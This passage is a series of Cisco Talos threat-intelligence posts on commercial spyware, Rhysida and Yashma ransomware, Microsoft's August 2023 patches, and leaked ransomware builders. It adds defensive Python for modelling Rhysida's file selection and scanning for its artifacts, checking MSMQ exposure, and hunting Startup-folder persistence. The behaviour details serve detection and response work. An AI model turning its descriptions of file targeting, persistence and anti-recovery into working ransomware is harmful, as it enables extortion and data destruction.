A recent report from the United Kingdom’s National Cyber Security Centre (NCSC) highlights how the accessibility of these tools β€œlowers the barrier to entry to state and non-state actors in obtaining capability and intelligence.” The United States government also threatened to step in when it looked like a U.S. company was going to purchase NSO Group, an infamous Israeli maker of the Pegasus spyware.

What ways can you protect yourself if you might be a target of commercial spyware?

As the victims of commercial spyware are highly targeted individuals, the sobering truth is that some attackers have the means to be able to spend six figures to compromise a single target. It is therefore likely that they will try many things to compromise your mobile phone, including using zero-day attacks or unknown vulnerabilities.

That is very concerning to us, however, there are a couple of things that end users can look out for:

Although zero-click exploits do exist, they're not very common. Most of the time, unsolicited messages from various people are the first entry point. So, if you get a bunch of messages from strangers, don't click on the links, and don’t click on any attachments.

Additionally, something as simple as rebooting your phone can help clear the spyware from your device. This is because commercial spyware companies typically do not build persistence into their spyware.

If you are talking to someone who may be a target of commercial spyware (i.e., human rights journalists, activists, dissidents and lawyers) it’s a good idea to reboot your phone before you talk to them. It is entirely possible that these threat actors will go as far as compromising close contacts of their targets.

Notable example of commercial spyware

Talos provided a highly informative article on the PREDATOR commercial spyware, which has been around since 2019.

PREDATOR is intended to work with another spyware component called β€œALIEN” (it’s not β€œAlien vs. Predator” this time; they’re working together). They work to bypass traditional security barriers on the Android operating system and provide a variety of information stealing, surveillance and remote access capabilities.

The differences between commercial spyware and digital extortion attacks

You may have received an email something like, β€œWe know you’ve visited this adult website. We filmed you watching some videos. Now we’re going to send all your friends and family that footage unless you pay us in bitcoins.”

These are typically digital extortion attacks, not actual spyware. Attackers send these emails to multiple accounts, hoping that someone will believe the story, and pay up.

As we’ve talked about, commercial spyware is highly targeted. The customers of these commercial spyware organizations know who their victim(s) are. In digital extortion attacks, cyber criminals generally don’t know who their victims are, but they’re hoping as many people as possible believe the story, and pay up.

They will usually have found your email address via a data breach of a third party. If you receive such an email, just delete it and don’t give it a second thought. The email you received will be one of many thousands.

What is Cisco doing to take action against the growth of commercial spyware?

Cisco, Microsoft, and other tech companies have joined in supporting Meta's lawsuit against the NSO Group referenced above through court filings. Cisco was also a key drafter of the Cyber Mercenary Principles document adopted by the Cyber Tech Accord. The document acknowledges the threat realized by these commercial offerings and outlines the steps that organizations are taking to help limit the impacts of commercial spyware.

Learn more

Researchers at Cisco Talos recently wrote an β€˜On the Radar’ article about the growth of spyware-based intelligence providers, without legal or ethical supervision. The article also looks to the untethered future of commercial spyware and contains advice about what to do if you feel you have been targeted with spyware - especially if you have a higher risk profile (i.e., journalists and dissidents).

Also check out this episode of the Talos Takes podcast, where Asheer Malhotra talks to Jon Munshaw about the dangers of spyware and mercenary groups.

What Cisco Talos knows about the Rhysida ransomware

8 August 2023 at 19:36

Cisco Talos is aware of the recent advisory published by the U.S. Department of Health and Human Services (HHS) warning the healthcare industry about Rhysida ransomware activity.

As we've discussed recently, there has been huge growth in the ransomware and extortion space, potentially linked to the plethora of leaked builders and source code related to various ransomware cartels. This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly. Rhysida appears to have first popped up back in May, with several high-profile compromises posted on their leak site.

Rhysida ransomware details

As we commonly see in the ransomware space, this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control (C2) frameworks like Cobalt Strike. These frameworks are commonly delivered as part of traditional commodity malware, so infection chains can vary widely.

The group itself likes to pretend to be a cybersecurity organization as shown in the ransom note below. They claim to have compromised the company and are willing to help resolve the issue. These types of approaches are not uncommon β€” historically, groups have done things like provide "security reports" to compromised organizations to help them "resolve the issue."

Sample ransom note.

The group appears to commonly deploy double extortion β€” of the victims that have been listed on the leak site, several of them have had some portion of their exfiltrated data exposed.

Encryption algorithm

Rhysida’s encryption routine is relatively straightforward and uses the ChaCha20 stream cipher. We have seen this algorithm deployed by other groups before, either on its own or as part of a more custom approach. Rhysida enumerates the β€œA:” through β€œZ:” drives and the directories and files beneath them, checks that each file is not on the exclusion list, and then β€œprocesses,” i.e., encrypts, the file. Once encrypted, the file is renamed to β€œ<filename>.rhysida”.

Rhysida’s algorithm for β€œprocessing” files.

The file exclusion list maintained in Rhysida samples is most of the usual system directories required for the operating system to function:

Excluded folders.

Excluded extensions include:

.bat .bin .cab .cmd .com .cur .diagcab .diagcfg .diagpkg .drv .dll .exe .hlp .hta .ico .lnk .msi .ocx .ps1 .psm1 .scr .sys .ini Thumbs.db .url .iso .cab

After encryption, the ransomware drops the ransom note as a PDF, opens it, and changes the desktop wallpaper. The PDF, usually named β€œCriticalBreachDetected.pdf”, is generated from content embedded in the ransomware binary, including a skeleton PDF and the ransom note text shown above. The same ransom note text is also rendered into an image that is set as the background wallpaper, typically written to β€œC:/Users/Public/bg.jpg”.
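
The file-selection logic described above (drive enumeration, the exclusion list, the β€œ.rhysida” rename) and the dropped artifacts (β€œCriticalBreachDetected.pdf”, β€œC:/Users/Public/bg.jpg”) are enough to build two small tools: a model of which files the malware would touch, and a scan an incident responder can run over a file listing to find what it already touched. The following is an added example written for this post, not Talos or Rhysida code. The extension list is the one quoted above; the excluded-folder names are an assumption (the β€œExcluded folders” figure is not reproduced here), and the path listings are constructed sample data.

```python
"""Model of Rhysida's file-selection step, plus a defender-side scan for its artifacts.

Added example: this is not Talos or Rhysida code. The extension list is the one
quoted in the post. The excluded-folder list is an ASSUMPTION (the post's
'Excluded folders' figure is not reproduced here), so edit it to match the sample.
Path listings are plain strings (e.g. from `dir /s /b` or a forensic file list),
which lets the same logic run against a live host or an exported listing.
"""
import os
import string
from pathlib import Path, PurePosixPath

# Extension exclusion list quoted in the post. Thumbs.db is a file name, not an extension.
EXCLUDED_EXTENSIONS = {
    ".bat", ".bin", ".cab", ".cmd", ".com", ".cur", ".diagcab", ".diagcfg", ".diagpkg",
    ".drv", ".dll", ".exe", ".hlp", ".hta", ".ico", ".lnk", ".msi", ".ocx", ".ps1",
    ".psm1", ".scr", ".sys", ".ini", ".url", ".iso",
}
EXCLUDED_FILENAMES = {"thumbs.db"}
# ASSUMPTION: stand-ins for the OS directories in the post's 'Excluded folders' figure.
EXCLUDED_TOP_DIRS = {"windows", "program files", "program files (x86)", "$recycle.bin"}

RANSOM_EXT = ".rhysida"                       # appended to every encrypted file
RANSOM_NOTE = "criticalbreachdetected.pdf"    # usual name of the dropped PDF
WALLPAPER_PATH = "c:/users/public/bg.jpg"     # typical wallpaper location


def _split(path: str):
    """Normalise a Windows or POSIX path into (drive-less directory parts, file name)."""
    p = PurePosixPath(path.replace("\\", "/"))
    parts = list(p.parts)
    if parts and parts[0].endswith(":"):      # drop a 'C:' drive component
        parts = parts[1:]
    return parts[:-1], (parts[-1] if parts else "")


def would_be_encrypted(path: str) -> bool:
    """True if Rhysida's 'process' step would encrypt this file, per the post's description."""
    dirs, name = _split(path)
    if dirs and dirs[0].lower() in EXCLUDED_TOP_DIRS:
        return False
    if name.lower() in EXCLUDED_FILENAMES:
        return False
    return PurePosixPath(name).suffix.lower() not in EXCLUDED_EXTENSIONS


def select_targets(listing) -> list:
    """Files from a listing that would be encrypted (what the malware's loop would hit)."""
    return sorted(p for p in listing if would_be_encrypted(p))


def scan_for_artifacts(listing) -> dict:
    """Defender side: find renamed (.rhysida) files and the dropped note/wallpaper."""
    encrypted, artifacts = [], []
    for p in listing:
        norm = p.replace("\\", "/")
        name = norm.rsplit("/", 1)[-1].lower()
        if name.endswith(RANSOM_EXT):
            encrypted.append(p)
        elif name == RANSOM_NOTE or norm.lower() == WALLPAPER_PATH:
            artifacts.append(p)
    return {"encrypted": sorted(encrypted), "ransom_artifacts": sorted(artifacts)}


def iter_live_listing():
    """Enumerate drives A: through Z: the way the sample does (meaningful on Windows only)."""
    for letter in string.ascii_uppercase:
        root = Path(f"{letter}:/")
        if root.exists():
            for dirpath, _, filenames in os.walk(root):
                for fn in filenames:
                    yield os.path.join(dirpath, fn).replace(os.sep, "/")


# Constructed sample listings (not real victim data).
PRE_ATTACK_LISTING = [
    "C:/Users/alice/Documents/budget.xlsx",
    "C:/Users/alice/Documents/Thumbs.db",
    "C:/Users/alice/run.ps1",
    "C:/Windows/System32/kernel32.dll",
    "C:/Windows/notes.txt",
    "C:/Program Files/App/data.json",
    "D:/shares/finance/q3.pdf",
]
POST_ATTACK_LISTING = [
    "C:/Users/alice/Documents/budget.xlsx.rhysida",
    "C:/Users/alice/run.ps1",
    "C:/Users/Public/bg.jpg",
    "C:/Users/alice/Desktop/CriticalBreachDetected.pdf",
    "D:/shares/finance/q3.pdf.rhysida",
]

if __name__ == "__main__":
    print("would be encrypted:", select_targets(PRE_ATTACK_LISTING))
    print("post-attack scan:  ", scan_for_artifacts(POST_ATTACK_LISTING))
```

On a live Windows host, `scan_for_artifacts(iter_live_listing())` walks the same A: to Z: range the sample does. The wallpaper match is on the full path rather than the bare name, because `bg.jpg` on its own is far too common to be a useful indicator.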

This new ransomware variant doesn't have any novel features or functionality and points to the challenges organizations are facing as the landscape continues to shift and a plethora of new actors join their ranks. This isn't even the only new ransomware group we've written about this week.

Coverage

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Cisco Talos is releasing the following Snort SIDs to protect against this threat: 62220 - 62229, 300653 - 300657.

Indicators of compromise

Six critical vulnerabilities included in August’s Microsoft security update

8 August 2023 at 19:25

Microsoft disclosed 73 vulnerabilities across its suite of products and software Tuesday, including six that are considered β€œcritical.”

One of the vulnerabilities, which Microsoft considers to be only of "moderate" severity, has been actively exploited in the wild. The company has had to address many zero-day vulnerabilities in its monthly security updates this year, including four last month and one in May. Microsoft also released an advisory detailing changes to its defense-in-depth model to defend against tactics adversaries are currently using in the wild.

Outside of the six critical issues, two are considered to be of β€œmoderate” severity, while the remainder are listed as β€œimportant.”

Two of the critical vulnerabilities lie in Microsoft Teams, the company’s popular collaboration and messaging platform. An attacker could exploit CVE-2023-29328 and CVE-2023-29330 to perform remote code execution in the context of the victim user.

An attacker could exploit these vulnerabilities by tricking the victim into joining an adversary-created Teams meeting.

Three other critical remote code execution vulnerabilities β€” CVE-2023-35385, CVE-2023-36910 and CVE-2023-36911 β€” exist in Microsoft’s message queuing service for certain versions of Windows 10, 11 and Windows Server.

Message Queuing would need to be manually enabled on a target’s machine for it to be exploitable, according to Microsoft. Users can check whether they are exposed by looking for a running service named β€œMessage Queuing” on the device and checking whether TCP port 1801 is listening on the machine.
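
The two-part check above is easy to automate and to run over output collected from many hosts. The following is an added example, not Microsoft or Talos tooling: it parses the text of `sc query MSMQ` (MSMQ is the service name behind the β€œMessage Queuing” display name) and `netstat -ano -p TCP`, and reports a host as exposed only when the service is running and port 1801 is actually listening. The sample command output embedded in the block is constructed so the example runs offline; `assess_live()` runs the real commands on a Windows host.

```python
"""Check whether a Windows host exposes the Message Queuing (MSMQ) service.

Added example, not Microsoft or Talos tooling. It applies the two checks the post
gives: is the service named 'Message Queuing' (service name MSMQ) running, and is
TCP port 1801 in the LISTENING state. The parsers work on the text of
`sc query MSMQ` and `netstat -ano -p TCP`; the sample output below is constructed
so the example runs offline, and assess_live() feeds them real output on Windows.
"""
import re
import subprocess


def msmq_service_running(sc_query_output: str) -> bool:
    """Parse `sc query MSMQ` output. False if the service is absent or not RUNNING."""
    if "FAILED 1060" in sc_query_output:          # ERROR_SERVICE_DOES_NOT_EXIST
        return False
    m = re.search(r"STATE\s*:\s*\d+\s+([A-Z_]+)", sc_query_output)
    return bool(m) and m.group(1) == "RUNNING"


def port_1801_listening(netstat_output: str) -> list:
    """Return the local socket addresses on which TCP 1801 is listening."""
    listeners = []
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0].upper() != "TCP" or fields[3].upper() != "LISTENING":
            continue
        local = fields[1]                              # e.g. 0.0.0.0:1801 or [::]:1801
        if local.rsplit(":", 1)[-1] == "1801":         # exact port, so 18011 does not match
            listeners.append(local)
    return listeners


def assess(sc_query_output: str, netstat_output: str) -> dict:
    """Combine both checks. 'exposed' means the service runs AND the port is open."""
    running = msmq_service_running(sc_query_output)
    listeners = port_1801_listening(netstat_output)
    return {"service_running": running, "listeners": listeners,
            "exposed": running and bool(listeners)}


def assess_live() -> dict:
    """Run the real commands (Windows only) and assess their output."""
    sc = subprocess.run(["sc", "query", "MSMQ"], capture_output=True, text=True).stdout
    ns = subprocess.run(["netstat", "-ano", "-p", "TCP"], capture_output=True, text=True).stdout
    return assess(sc, ns)


# Constructed sample output (not captured from a real host).
SC_QUERY_RUNNING = """
SERVICE_NAME: MSMQ
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
"""
SC_QUERY_STOPPED = SC_QUERY_RUNNING.replace("4  RUNNING", "1  STOPPED")
SC_QUERY_MISSING = ("[SC] EnumQueryServicesStatus:OpenService FAILED 1060:\n\n"
                    "The specified service does not exist as an installed service.\n")
NETSTAT_WITH_MSMQ = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:1801           0.0.0.0:0              LISTENING       3412
  TCP    [::]:1801              [::]:0                 LISTENING       3412
  TCP    0.0.0.0:18011          0.0.0.0:0              LISTENING       77
  TCP    192.168.1.10:49723     203.0.113.5:443        ESTABLISHED     5220
"""

if __name__ == "__main__":
    print("service running, port open:", assess(SC_QUERY_RUNNING, NETSTAT_WITH_MSMQ))
    print("service not installed:     ", assess(SC_QUERY_MISSING, NETSTAT_WITH_MSMQ))
```

Treating β€œservice installed but stopped” as not exposed matches the vendor’s statement that the feature must be enabled to be exploitable, but a stopped MSMQ is one `Start-Service` away from listening, so fleet inventories should still record it.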

The last critical vulnerability included in August’s Patch Tuesday is CVE-2023-36895, a remote code execution vulnerability in Microsoft Word. However, its CVSS score of 7.8 out of 10 is relatively low for a critical vulnerability.

Microsoft Exchange also contains four remote code execution vulnerabilities, though all are considered β€œimportant.”

An authenticated attacker who is on the same intranet as the Exchange Server could achieve remote code execution via a PowerShell remoting session, according to Microsoft, by exploiting CVE-2023-35388, CVE-2023-35368, CVE-2023-38182 and CVE-2023-38185.

An adversary could only exploit the vulnerabilities in Exchange Server if they have valid credentials to log in with LAN access and have access to a valid Exchange user account.

There are also four elevation of privilege issues in the Windows kernel that could allow an adversary to gain SYSTEM-level privileges: CVE-2023-35359, CVE-2023-35380, CVE-2023-35382 and CVE-2023-35386.

Microsoft’s advisories state that these issues are β€œmore likely” to be exploited, though the adversary must first have local access to the targeted machine, and the targeted user needs to be able to create folders and performance traces on the machine, which most users have by default.

Another privilege escalation vulnerability, CVE-2023-36900, exists in the Windows Common Log File System Driver. An attacker could also exploit this vulnerability to gain SYSTEM-level privileges, though they first must be able to log into the targeted system with the privileges of a standard user.

The only vulnerability Microsoft states is being exploited in the wild is CVE-2023-38180, a denial-of-service vulnerability in .NET and Microsoft Visual Studio. Though few details about this issue are currently available, Microsoft states that the attack complexity is β€œlow” and that exploitation requires no privileges or user interaction.

Talos would also like to highlight five β€œimportant” vulnerabilities that Microsoft considers β€œless likely” to be exploited. However, as these issues exist in the popular Microsoft Office suite of products and could lead to remote code execution, they are still worth noting:

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 40689, 40690, 62202, 62203, 62208 - 62211, 62215 and 62216. The Snort 3 rules are 300648 - 300650 and 300652.

Code leaks are causing an influx of new ransomware actors

7 August 2023 at 12:00

Ransomware gangs are consistently rebranding or merging with other groups, as highlighted in our 2022 Year in Review, or these actors work for multiple ransomware-as-a-service (RaaS) outfits at a time, and new groups are always emerging.

This trend is already continuing this year. Since 2021, there have been multiple leaks of ransomware source code and builders β€” components that are essential to creating and modifying ransomware. This has had a significant effect on the threat landscape, giving unsophisticated actors the ability to easily generate their own ransomware with little effort or knowledge. As more actors enter this space, Cisco Talos is seeing an increasing number of ransomware variants emerge, leading to more frequent attacks and new challenges for cybersecurity professionals, particularly regarding actor attribution.

Code leaks are benefitting threat actors

Since September 2021, we have seen actors publicly disclosing source code and builders for prominent ransomware families, including Babuk, Conti, LockBit 3.0 and Chaos. In some cases, such as LockBit 3.0’s ransomware builder, these leaks have been intentional, with affiliates posting these tools and codes to protest against broader group policies they are unhappy with. In other instances, such as the Babuk source code, the leaks were seemingly an operational error. Regardless of the cause, these leaks are having a significant effect on the threat landscape, making it easier for novice or unskilled actors to develop their own ransomware variants without much effort or knowledge.

Ransomware source code contains the instructions and algorithms that define the ransomware’s behavior. It is usually complex and often requires skilled developers to write. Having access to such code therefore allows threat actors with minimal programming knowledge to modify and compile their own ransomware variants.

Ransomware builders usually have a user interface that allows users to choose the underlying features and customize the configurations to build a new ransomware binary executable without exposing the source code or needing a compiler installed. The availability of such builders allows novice actors to generate their own customized ransomware variants. An example of a leaked Chaos ransomware builder V5 is shown in the picture below.

When ransomware source code or builders are leaked, it becomes easier for aspiring cybercriminals who lack the technical expertise to develop their own ransomware variants by making only minor modifications to the original code. Additionally, by using leaked source code, threat actors can confuse or mislead investigators, as security professionals may be more likely to misattribute the activity to the wrong actor.

New variants based on leaked code are becoming more common

We have continued seeing various malicious campaigns since the start of 2023, where the threat actors have used new ransomware variants based on leaked source code or builders. Early this year, Talos discovered a new ransomware family called MortalKombat generated by the leaked Xorist ransomware builder. Xorist ransomware, which operates under the RaaS model, has a builder called β€œEncoder Builder v.24” that is available on underground forums. Based on our research, we discovered an unknown threat actor using MortalKombat ransomware since December 2022 to target individuals and smaller companies. This campaign has a multi-stage attack chain that begins with a phishing email delivered to victims impersonating CoinPayments, a legitimate global cryptocurrency payment gateway.

In April, Talos discovered a new ransomware actor, RA Group, conducting double extortion attacks using their ransomware variant based on leaked Babuk source code. Babuk, a Russian ransomware group that emerged in 2021, has conducted a series of high-profile ransomware attacks across various industries, including government, healthcare, logistics, and professional services. Since an alleged member of the Babuk group leaked the full source code of its ransomware in September 2021, several new variants based on the leaked code have emerged, with many appearing in 2023, including ESXiArgs, Rorschach and RTM Locker, in addition to RA Group. RA Group, in its ongoing campaigns, has targeted the U.S., South Korea, Taiwan, the U.K. and India across several business verticals, including manufacturing, wealth management, insurance providers, pharmaceuticals and financial management consulting companies.

Most recently, Talos observed a surge in new ransomware strains emerging from the Yashma ransomware builder. Yashma ransomware builder, which first appeared in May 2022, is a rebranded version of the Chaos ransomware builder V5, which was leaked in April 2022. Since early 2023, we have seen several new Yashma strains emerge, including ANXZ, Sirattacker, and Shadow Men Team. Shadow Men Team β€” whose name we derived from a translation of their Hindi name in the ransom note β€” appears to be a new actor in the ransomware space. The actors appear to target victims in Kuwait, as the ransom note demands payment in Kuwaiti dinar before translating that sum to its U.S. dollar equivalent in Bitcoin.

Another new actor we discovered, seemingly of Vietnamese origin, uses a Yashma ransomware variant to target victims in Bulgaria, China, Vietnam and other countries. The campaign started in at least June 2023, and the ransom note appears to mimic certain aspects of the ransom note used in the global WannaCry attacks from 2017.

Actors repurposing leaked code are demanding low ransom payments

Cybercriminals leveraging leaked code and builders are seemingly more conservative in their ransom demands, a possible indication that they are lone wolf operators, proceeding cautiously as they test their new variants or are new players in this space. Actors behind many of these new ransomware variants, including Sirattacker, Chaos 2.0, Chaos 4.0, DCrypt, and Shadow Men Team, are demanding payments ranging from USD $3.50 to $4,390 in Bitcoin from victims. These ransom demands are significantly lower than those made by many well-known ransomware gangs like RYUK, Babuk, REvil, Conti, DarkSide, BlackMatter, BlackCat, and Yanluowang, which are typically in the millions of dollars. These more profitable groups usually operate under the RaaS model, meaning their affiliates are free to set their own (often high) ransom demands, and/or are structured so they pay their operators and developers, thereby driving up the amount of money they seek to take in during the course of their operations.

Below is a comparison of ransom demands made by actors using leaked code or builders and well-known ransomware gangs.

Opportunities for security researchers and defenders

While these changes in the threat landscape have largely benefitted threat actors, security researchers and defenders also have an advantage with access to the leaked code. It allows security researchers to analyze the source code and understand the attacker’s tactics, techniques and procedures (TTPs), which helps security professionals develop effective detection rules and enhance security products' capabilities in combating ransomware threats.

By analyzing the source code, researchers can identify similar patterns and techniques used by different threat actors, providing defenders with a way to proactively detect and block the new variants at the initial stage of an attack. Security researchers can also share the intelligence information derived from the leaked code with the broader security community, thereby contributing to strengthening the cybersecurity space. By understanding the TTPs of the leaked source codes, defenders will gain invaluable insights that are helpful in identifying and mitigating any existing security weakness in their environment and improving their security defense against these attack vectors.

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware

7 August 2023 at 12:00
  • Cisco Talos discovered an unknown threat actor, seemingly of Vietnamese origin, conducting a ransomware operation that began at least as early as June 4, 2023.
  • This ongoing attack uses a variant of the Yashma ransomware likely to target multiple geographic areas by mimicking WannaCry characteristics.
  • The threat actor uses an uncommon technique to deliver the ransom note. Instead of embedding the ransom note strings in the binary, they download the ransom note from the actor-controlled GitHub repository by executing an embedded batch file.

Threat actor analysis

Talos assesses with high confidence that this threat actor is targeting victims in English-speaking countries, Bulgaria, China and Vietnam, as the actor’s GitHub account, β€œnguyenvietphat,” hosts ransom notes written in these countries’ languages. The presence of an English version could indicate the actor intends to target a wide range of geographic areas.

Talos assesses with moderate confidence that the threat actor may be of Vietnamese origin because their GitHub account name and email contact on the ransomware notes spoofs a legitimate Vietnamese organization’s name. The ransom note also asks victims to contact them between 7 and 11 p.m. UTC+7, which overlaps with Vietnam’s time zone. We also spotted a slight difference in the Vietnamese language ransom note, as it starts with, β€œSorry, your file is encrypted!” in contrast to the others that begin with, β€œOops, your files are encrypted!” By saying β€œsorry,” the threat actor may have intended to show a heightened sensitivity toward victims in Vietnam, which could indicate the attackers themselves are Vietnamese.

We further assess the threat actor began this campaign around June 4, 2023, because they joined GitHub and created a public repository called β€œRansomware” on that date, which overlaps with the compilation date of the ransomware binary. In the repository, they added ransom note text files in five languages: English, Bulgarian, Vietnamese, Simplified Chinese and Traditional Chinese.

GitHub repository that contains ransom notes.

Ransom note

The actor demands the ransom payment in Bitcoin to the wallet address β€œbc1qtd4qv0wmgtu2rdr0wr8tka2jg44cgmz04z5mc7” and doubles the ransom if the victim fails to pay within three days, according to our ransom note analysis. The actor provides an email address, β€œnguyenvietphat[.]n[at]gmail[.]com,” for victims to contact them. At the time of our analysis, we had not observed any Bitcoin in the wallet, and the ransom note did not specify an amount, indicating the ransomware operation might still be in a nascent stage.

The ransom note text resembles the well-known WannaCry ransom note, possibly to obfuscate the threat actor’s identity and confuse incident responders.

The ransom note for WannaCry ransomware.

Ransom notes samples of the Yashma variant.


After encryption, the Yashma ransomware variant sets the wallpaper on the victim’s machine, as seen in the image below. It seems that the operator downloaded this picture from www[.]FXXZ[.]com and embedded it in the Yashma variant binary. The wallpaper set by the Yashma variant in the victim’s machine also mimics the WannaCry ransomware.


Yashma variant wallpaper (left) and WannaCry wallpaper (right).

Customized Yashma ransomware variant

The actor deployed a variant of Yashma ransomware, which they compiled on June 4, 2023. Yashma is a 32-bit executable written in .NET and a rebranded version of Chaos ransomware V5, which appeared in May 2022. In this variant, most of Yashma’s features remained unchanged and have been described by the security researchers at BlackBerry, with the exception of a few notable modifications.

Usually, ransomware embeds the ransom note text as strings in the binary. This Yashma variant instead executes an embedded batch file whose commands download the ransom note from the actor-controlled GitHub repository. Keeping the note out of the binary may help it evade endpoint detection and anti-virus signatures that key on embedded ransom note strings, at the cost of requiring outbound access to GitHub at run time, which also makes the repository itself a usable network indicator.

Contents of the batch file.

Earlier versions of the Yashma ransomware established persistence on the victim machine through the Run registry key and by dropping a Windows shortcut file pointing to the ransomware executable in the Startup folder. The variant we observed also established persistence in the Run registry key, but it was modified to create a β€œ.url” bookmark file in the Startup folder that points to the dropped executable located at β€œ%AppData%\Roaming\svchost.exe”.

A function that creates the bookmark file.
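A hunting check for the Startup-folder persistence artifact described above, added here as an example; it is not Talos code and not part of the Yashma analysis. It parses the `[InternetShortcut]` section of a `.url` file and flags targets that are local executables in user-writable locations or that masquerade as Windows system binaries. The directory markers, system binary names and the three sample files are constructed for the example.

```python
"""Hunt for suspicious Windows Startup-folder .url files.

Added example, not Talos code. It parses the [InternetShortcut] section of a
.url file and flags targets that are local executables in user-writable
locations, the pattern the Yashma variant uses to relaunch its dropped
svchost.exe at logon. The sample files below are constructed.
"""
import os
import re
from dataclasses import dataclass, field
from urllib.parse import unquote, urlparse

# Locations a legitimate shortcut rarely points at but droppers favour (assumed list).
WRITABLE_DIR_MARKERS = ("%appdata%", "%localappdata%", "%temp%", "%tmp%",
                        "\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".vbs", ".js", ".hta", ".ps1")
# Names that only belong under C:\Windows; anywhere else they are masquerading.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe", "winlogon.exe"}


@dataclass
class Finding:
    name: str
    target: str
    reasons: list = field(default_factory=list)


def shortcut_target(text):
    """Return the URL= value from the [InternetShortcut] section, or None."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        key, sep, value = line.partition("=")
        if section == "internetshortcut" and sep and key.strip().lower() == "url":
            return value.strip()
    return None


def local_path(target):
    """Normalise a target to a Windows path if it refers to the local disk, else None."""
    parsed = urlparse(target)
    if parsed.scheme == "file":
        path = unquote(parsed.path)
        if re.match(r"^/[A-Za-z]:", path):      # file:///C:/... -> C:/...
            path = path[1:]
        if parsed.netloc:                      # file://server/share -> UNC path
            path = "\\\\" + parsed.netloc + path
        return path.replace("/", "\\")
    if re.match(r"^[A-Za-z]:\\", target) or target.startswith("\\\\") or target.startswith("%"):
        return target                          # bare path or unexpanded env var
    return None                                # ordinary http(s) bookmark


def assess(name, text):
    """Return a Finding if the .url content looks like a persistence launcher."""
    target = shortcut_target(text)
    path = local_path(target) if target else None
    if path is None:
        return None
    low = path.lower()
    reasons = []
    if low.endswith(EXEC_EXT):
        reasons.append("target is an executable rather than a document or web page")
    if any(m in low for m in WRITABLE_DIR_MARKERS):
        reasons.append("target lives in a user-writable directory")
    if low.rsplit("\\", 1)[-1] in SYSTEM_NAMES and not low.startswith("c:\\windows\\"):
        reasons.append("filename masquerades as a Windows system binary")
    return Finding(name, path, reasons) if reasons else None


def scan_texts(samples):
    """Assess a {name: file_content} mapping; returns the list of findings."""
    return [f for f in (assess(n, t) for n, t in samples.items()) if f]


def scan_startup_folder(folder):
    """Assess every .url file in a real Startup folder (run on a Windows host)."""
    samples = {}
    for entry in os.listdir(folder):
        if entry.lower().endswith(".url"):
            with open(os.path.join(folder, entry), encoding="utf-8", errors="replace") as fh:
                samples[entry] = fh.read()
    return scan_texts(samples)


# Constructed sample files: two persistence launchers and one benign bookmark.
SAMPLES = {
    "svchost.url": "[InternetShortcut]\r\nURL=file:///C:/Users/victim/AppData/Roaming/svchost.exe\r\nIconIndex=0\r\n",
    "update.url": "[InternetShortcut]\r\nURL=%AppData%\\Roaming\\svchost.exe\r\n",
    "docs.url": "[InternetShortcut]\r\nURL=https://docs.example.com/start\r\n",
}

if __name__ == "__main__":
    for finding in scan_texts(SAMPLES):
        print(finding.name, "->", finding.target, "|", "; ".join(finding.reasons))
```

On a live host, point `scan_startup_folder` at each user's `%AppData%\Microsoft\Windows\Start Menu\Programs\Startup` as well as the all-users Startup folder; the `.url` check complements, rather than replaces, a review of the Run registry key the same variant also writes.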

One notable feature the threat actor chose to keep in this variant is Yashma’s anti-recovery capability. After encrypting a file, the ransomware wipes the contents of the original unencrypted file, writes a single β€œ?” character and then deletes the file. Because the original content is overwritten before deletion, undelete and file-carving tools recover only the one-byte stub, which makes it more challenging for incident responders and forensic analysts to recover the deleted files from the victim’s hard drive.

The code snippet shows the anti-recovery feature of the ransomware.

Coverage


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

